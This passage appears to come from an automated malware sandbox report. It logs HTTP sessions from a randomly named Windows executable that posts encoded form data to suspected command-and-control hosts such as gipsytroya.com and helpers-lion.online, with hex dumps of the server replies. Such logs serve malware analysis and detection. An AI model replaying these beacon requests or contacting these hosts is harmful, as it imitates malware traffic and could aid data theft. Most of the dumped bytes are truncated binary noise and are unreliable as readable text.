                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.54974691.195.240.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:09.029320955 CEST801OUTPOST /tf44/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.gipsytroya.com
                      Origin: http://www.gipsytroya.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.gipsytroya.com/tf44/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 4d 74 6f 73 59 5a 53 41 6c 33 64 31 6a 4b 52 71 74 45 4d 48 55 4c 33 42 64 7a 5a 6c 38 48 4a 49 50 78 2f 31 70 42
                      Data Ascii: 66s0QHx=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVMtosYZSAl3d1jKRqtEMHUL3BdzZl8HJIPx/1pB
                      Jul 2, 2024 07:18:09.665121078 CEST707INHTTP/1.1 405 Not Allowed
                      date: Tue, 02 Jul 2024 05:18:09 GMT
                      content-type: text/html
                      content-length: 556
                      server: Parking/1.0
                      connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.54974791.195.240.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:11.566694975 CEST1818OUTPOST /tf44/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.gipsytroya.com
                      Origin: http://www.gipsytroya.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.gipsytroya.com/tf44/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 65 63 72 49 6e 69 6d 56 58 42 42 56 4e 4f 67 39 49 70 45 31 39 56 65 48 7a 64 51 64 46 79 47 58 49 64 30 33 64 7a 54 6d 52 4a 62 5a 32 2b 37 41 38 69 6d 54 65 2b 6e 47 41 69 56 30 6d 72 75 34 32 58 6c 4f 54 4d 58 4b 78 50 6a 35 39 65 48 4d 4b 72 46 69 6e 32 36 4b 73 57 55 31 4c 31 33 2f 32 73 44 34 38 46 37 35 76 62 77 72 41 50 57 34 31 37 41 31 74 39 31 4f 48 71 54 4f 44 53 62 39 78 6e 58 57 46 59 36 4c 4a 73 4d 78 67 72 74 45 30 4e 56 41 77 64 6d 49 50 41 47 6b 39 33 44 57 [TRUNCATED]
                      Data Ascii: 66s0QHx=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhecrInimVXBBVNOg9IpE19VeHzdQdFyGXId03dzTmRJbZ2+7A8imTe+nGAiV0mru42XlOTMXKxPj59eHMKrFin26KsWU1L13/2sD48F75vbwrAPW417A1t91OHqTODSb9xnXWFY6LJsMxgrtE0NVAwdmIPAGk93DWbKvlATDjDHzoLaZLGuxCuNHn4Oc3Lcw8qW9ljCs9g3k/JVgYg9rgnfoMQeyEVVZG91H305bwAjzUaSKavBSJbeY4/84ElgMAp1lbwl9LKP41iPmRwQG7KrRKQTaJHhs9vM9slpQZzV6uZHKg/5FXnih55QIcd+EOQNd0mVFTqXoP+I6utiBS0M5N4b8EHdMV1Sn6FWJuiX0rWC4/EsCCFyHX0cWFeOH4+BZlqkzMkvwlttyG4TKWfBWdQrWabLGDn+9SmLY/ey2wrePtxwqd3nVi55h6e57R0RREK4OTRhWNNua/mobqx/3ihgdUgMEs6IYWO96sseW4Tcf1bCVdPCipmHYt3l7S5Wv+drsEQDUFNOnHkjr4jFim19EYJtEAiihF3075F7Sv22JfRIlFs2PIOFaq4wLJ8ApU96eg3NrjwIjEA6GSahR/6hN7Wl0aJV5Nh/NBxfUBXSluhSB/D6HEDUcL/ZXnDBr9zceSM6YGjCji1uf+SF94rvexeQeF+cj/eJteCZNVKL6tPsDBMscilKbQc1HMGFJqfxQLx/Py2y3hb6K04ZQltSz3E+5NL5iP14X9gbbNABEOkePIPfgLNk0Em0Sc77yjr6ujmuzXxjcsZa32QXwhGN6IQ0hE1V1ZaMH8gIhrHAysnjYvrBgIF/xIqHswWN [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.54974891.195.240.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:14.093550920 CEST524OUTGET /tf44/?66s0QHx=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.gipsytroya.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:18:14.753308058 CEST113INHTTP/1.1 439
                      date: Tue, 02 Jul 2024 05:18:14 GMT
                      content-length: 0
                      server: Parking/1.0
                      connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.549749194.58.112.174806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:19.901547909 CEST796OUTPOST /mooq/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.helpers-lion.online
                      Origin: http://www.helpers-lion.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.helpers-lion.online/mooq/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 52 42 38 33 49 62 4b 43 6f 51 66 34 6b 2f 52 64 68 69 31 57 79 69 69 30 73 54 56 46 56 2f 4c 66 58 36 68 4a 69 54 4e 38 41 56 6d 75 53 62 39 4f 61 33 48 72 48 4d 52 51 6a 63 45 44 76 62 36 48 52 49 34 67 43 49 6a 6e 4e 63 6a 52 47 45 6d 35 33 56 71 68 43 75 77 46 6d 62 4e 68 41 74 45 54 2f 77 4a 47 6e 61 37 59 38 58 33 6e 4e 7a 44 6c 67 6d 39 4f 45 64 41 49 2f 36 55 7a 56 52 61 74 4e 68 4f 34 71 4b 45 6d 78 30 4c 6f 41 37 75 41 46 71 72 44 48 69 4e 64 71 4f 51 4f 62 2b 53 70 62 6b 53 43 47 6f 53 61 36 4e 6c 79 68 4b 79 4a 57 55 41 72 71 47 69 2b 36 34 3d
                      Data Ascii: 66s0QHx=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrDHiNdqOQOb+SpbkSCGoSa6NlyhKyJWUArqGi+64=
                      Jul 2, 2024 07:18:20.619415045 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:20 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                      Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                      Jul 2, 2024 07:18:20.619503021 CEST1236INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                      Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                      Jul 2, 2024 07:18:20.619514942 CEST1236INData Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                      Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                      Jul 2, 2024 07:18:20.619884014 CEST114INData Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                      Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.549750194.58.112.174806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:22.648730040 CEST816OUTPOST /mooq/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.helpers-lion.online
                      Origin: http://www.helpers-lion.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.helpers-lion.online/mooq/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 72 4c 66 33 4b 68 49 6e 76 4e 37 41 56 6d 68 79 62 34 44 36 33 59 72 48 41 5a 51 6a 51 45 44 76 66 36 48 51 34 34 31 6c 6b 6b 6d 64 63 68 58 47 45 6f 33 58 56 71 68 43 75 77 46 6d 2f 7a 68 45 4a 45 54 50 41 4a 47 47 61 34 51 63 58 6f 67 4e 7a 44 68 67 6d 68 4f 45 64 75 49 37 36 2b 7a 54 64 61 74 4d 52 4f 37 37 4b 44 78 68 30 4e 6d 67 36 50 4e 41 4c 45 45 46 32 32 42 59 43 57 59 62 4c 75 73 74 4a 34 59 6b 67 36 4a 61 68 64 69 79 43 46 59 6d 31 70 78 4a 57 53 67 74 73 39 72 4e 6e 70 62 4f 2b 58 42 30 5a 38 72 76 62 50 42 76 75 31
                      Data Ascii: 66s0QHx=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JahdiyCFYm1pxJWSgts9rNnpbO+XB0Z8rvbPBvu1
                      Jul 2, 2024 07:18:23.609554052 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:23 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                      Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                      Jul 2, 2024 07:18:23.609580994 CEST1236INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                      Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                      Jul 2, 2024 07:18:23.609592915 CEST1236INData Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                      Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                      Jul 2, 2024 07:18:23.609797955 CEST114INData Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                      Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0
                      Jul 2, 2024 07:18:23.609858036 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:23 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                      Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.549751194.58.112.174806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:25.186091900 CEST1833OUTPOST /mooq/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
